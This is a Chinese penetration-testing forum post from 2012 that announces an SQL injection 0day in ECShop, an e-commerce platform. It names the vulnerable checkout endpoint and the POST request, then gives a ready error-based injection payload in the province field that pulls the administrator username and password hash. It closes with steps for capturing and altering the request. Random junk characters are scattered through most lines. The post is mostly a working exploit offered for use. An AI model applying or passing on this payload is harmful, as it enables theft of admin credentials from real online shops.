中国网络渗透测试联盟

标题: ECShop全版本SQL注入0day [打印本页]
作者: admin    时间: 2012-12-31 09:19
标题: ECShop全版本SQL注入0day
感谢欠杀的黑盒4 B$ ^9 ]- N7 y. ~5 U+ v/ `' x# P% o
, L/ G% N5 {9 S  m, q/ c, W& b& b

2 X: W2 A& L! L把任意商品加入购物车在填写配送地址那一页,有地区选择
8 T$ I0 R" K7 t5 P, m
) a3 Z' ~$ I' W* k+ _0 Hflow.php?step=consignee&direct_shopping=1. J: ]8 G3 S! v- }  c. L- f
比如省选择安徽
) Y: o0 m+ I5 v4 k- a
: W" m# Z. Z8 ]) K1 V" B其中POST数据如下
* S8 w: }% n/ L " F8 h5 f2 Z7 s) y+ l' l
country=1&province=3&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=province=3
# `" K% |4 [9 K, `; r改成+ h' `( g4 a! q: i/ }
5 q* |  \0 U  |, H- L* d: S
province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #
4 X! ?( ^1 _& r  Rps:详细的方法,用火狐tamper data插件……..即可改post内容…..2 i( X5 L% {! n, n4 B

8 c1 ?% }+ |6 o0 R; M先注册账户,随便选个商品进购物车,然后填地址,电话什么的,填好开始抓包,改包7 S: A% D" k7 f' Z9 \) Y5 R- x

! L0 H2 C; o5 P; O" a4 G就会回显错误页面了。。。。4 y1 ^! A( D+ C: Q

! P4 D" ?# }0 x' e2 o2 w* ~我自己没用这个日站过,就测试了一个最新版和老版本,均ok,所以写全版本,理论上应该是的+ c3 ?: |4 O, u- D




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2